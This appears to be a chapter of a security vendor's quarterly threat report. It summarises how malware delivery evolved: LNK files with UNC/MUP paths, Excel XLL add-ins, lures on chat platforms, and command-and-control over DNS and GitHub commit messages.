Chapter 4: Complex Delivery Chains: The Evolving Tactics of Malware and Phishing Threats


In Q4 attackers persisted in employing LNK files for email-based assaults, amplifying the complexity in the linked executable path to heighten the challenge of analysis. Simultaneously, supply chain attacks, directed at IT professionals and business servers, gained prominence, featuring instances such as the deployment of malicious GitHub Gists, enticing developers to install nefarious extensions.


compley delivery chains


Beyond the Inbox: New Attack Vectors for Adversaries

Expanding their reach beyond conventional emails, cyber adversaries explored fresh attack vectors, leveraging communication platforms like Microsoft Teams, Skype, and Facebook Messenger.

Furthermore, a notable trend emerged as threat actors increasingly adopted Microsoft Excel Add-Ins (XLL), presenting a deceptive facade resembling Excel files while harboring native executable code akin to DLL files.


The Surge in UNC/MUP Paths in Malicious LNK Files

A noteworthy shift surfaced with the heightened utilization of UNC/MUP paths particularly in LNK files. Multiple UNC Paths (MUP) is a feature in Windows that allows UNC paths to represent various protocols, such as WebDAV. When processing a MUP, Windows attempts to identify the correct protocol by iterating through options like TS Client, SMB, and WebDAV in a specific order.

This behavior poses a challenge for automated analysis because it involves interacting with multiple protocols, potentially complicating the process.


Innovations in Command and Control (C2)

Malware authors showcased inventiveness in their Command and Control (C2) implementations, where a resurgence in leveraging DNS for C2 communications emerged, introducing a method that poses increased difficulty in detection and blocking.

Notably inventive was a case where a malware author experimented with using GitHub commit messages as a conduit for relaying executable code to infected devices. This method represents a creative twist in malware communication, exploiting the ubiquity and trust associated with popular development platforms.